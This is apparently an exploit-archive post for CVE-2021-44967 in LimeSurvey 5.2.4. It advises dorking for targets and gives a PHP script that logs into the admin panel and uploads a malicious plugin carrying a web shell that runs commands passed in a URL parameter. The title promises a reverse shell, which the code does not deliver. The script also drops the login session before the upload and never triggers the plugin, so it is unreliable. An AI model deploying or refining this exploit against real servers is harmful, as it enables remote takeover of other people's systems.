📄 LimeSurvey 5.2.4 Remote Code Execution

=============================================================================================================================================
    | # Title     : LimeSurvey 5.2.4 reverse shell Vulnerability                                                                                |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits)                                                            |
    | # Vendor    : https://www.limesurvey.org/                                                                                                 |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking İn Google Or Other Search Enggine.
    
    [+] Code Description: This script is used to exploit vulnerability in LimeSurvey to load a malicious PHP plugin and execute a reverse shell.
    
       (Related : https://packetstorm.news/files/id/189288/ Related CVE numbers: 	CVE-2021-44967 ) .
    	
    [+] save code as poc.php.
    
    [+] Set TArget : line 112
    
    [+] Usage : php poc.php
    
    [+] PayLoad :
    
    <?php
    
    /**
     * هذا السكريبت يُستخدم لاستغلال ثغرة CVE-2021-44967 في LimeSurvey لتحميل ملحق PHP خبيث وتنفيذ عكسية Shell.
     */
    
    // تعطيل تحذيرات SSL
    $context = stream_context_create([
        'ssl' => [
            'verify_peer' => false,
            'verify_peer_name' => false,
        ]
    ]);
    
    // إعدادات الملحق الخبيث
    $plugin_name = "ExploitRCE_" . rand(1000, 9999);
    $date = date("Y-m-d");
    $xml_config = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n";
    $xml_config .= "<config>\n";
    $xml_config .= "    <metadata>\n";
    $xml_config .= "        <name>$plugin_name</name>\n";
    $xml_config .= "        <type>plugin</type>\n";
    $xml_config .= "        <creationDate>$date</creationDate>\n";
    $xml_config .= "        <lastUpdate>$date</lastUpdate>\n";
    $xml_config .= "        <version>1.0</version>\n";
    $xml_config .= "    </metadata>\n";
    $xml_config .= "    <compatibility>\n";
    $xml_config .= "        <version>3.0</version>\n";
    $xml_config .= "        <version>4.0</version>\n";
    $xml_config .= "        <version>5.0</version>\n";
    $xml_config .= "        <version>6.0</version>\n";
    $xml_config .= "        <version>7.0</version>\n";
    $xml_config .= "    </compatibility>\n";
    $xml_config .= "</config>";
    
    // دالة تسجيل الدخول إلى LimeSurvey
    function limesurvey_authenticate($url, $username, $password) {
        echo "[*] محاولة تسجيل الدخول...\n";
        $login_url = "$url/index.php/admin/authentication/sa/login";
        $login_page = file_get_contents($login_url, false, $GLOBALS['context']);
        preg_match('/name=\"YII_CSRF_TOKEN\" value=\"(.*?)\"/', $login_page, $matches);
        $csrf_token = $matches[1] ?? '';
        
        $data = http_build_query([
            "YII_CSRF_TOKEN" => $csrf_token,
            "authMethod" => "Authdb",
            "user" => $username,
            "password" => $password,
            "login_submit" => "login"
        ]);
    
        $options = [
            "http" => [
                "method" => "POST",
                "header" => "Content-type: application/x-www-form-urlencoded",
                "content" => $data,
            ]
        ];
        
        $result = file_get_contents($login_url, false, stream_context_create($options));
        
        if (strpos($result, '/index.php/admin/index') !== false) {
            echo "[+] تسجيل الدخول ناجح!\n";
        } else {
            echo "[-] فشل تسجيل الدخول\n";
            exit();
        }
    }
    
    // رفع وتنفيذ الحمولة الخبيثة
    function upload_payload($url, $plugin_name, $payload) {
        echo "[*] رفع الحمولة الخبيثة...\n";
        $upload_url = "$url/index.php/admin/pluginmanager?sa=upload";
        
        $boundary = "----WebKitFormBoundary" . md5(time());
        $data = "--$boundary\r\n";
        $data .= "Content-Disposition: form-data; name=\"the_file\"; filename=\"$plugin_name.zip\"\r\n";
        $data .= "Content-Type: application/zip\r\n\r\n";
        $data .= $payload . "\r\n";
        $data .= "--$boundary--\r\n";
        
        $options = [
            "http" => [
                "method" => "POST",
                "header" => "Content-Type: multipart/form-data; boundary=$boundary",
                "content" => $data,
            ]
        ];
        
        $result = file_get_contents($upload_url, false, stream_context_create($options));
        
        if (strpos($result, 'sa=uploadConfirm') !== false) {
            echo "[+] رفع الحمولة ناجح!\n";
        } else {
            echo "[-] فشل في رفع الحمولة\n";
            exit();
        }
    }
    
    // إعداد الحمولة الخبيثة
    $payload = "<?php system(\$_GET['cmd']); ?>";
    $zip = new ZipArchive();
    $zip_file = tempnam(sys_get_temp_dir(), "exploit") . ".zip";
    $zip->open($zip_file, ZipArchive::CREATE);
    $zip->addFromString("config.xml", $xml_config);
    $zip->addFromString("payload.php", $payload);
    $zip->close();
    $payload_data = file_get_contents($zip_file);
    unlink($zip_file);
    
    // تنفيذ الاستغلال
    $url = "http://target-limesurvey.com"; // استبدل بعنوان الهدف
    $username = "admin";
    $password = "password";
    
    limesurvey_authenticate($url, $username, $password);
    upload_payload($url, $plugin_name, $payload_data);
    
    echo "[*] تم تنفيذ الاستغلال بنجاح!\n";
    
    
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================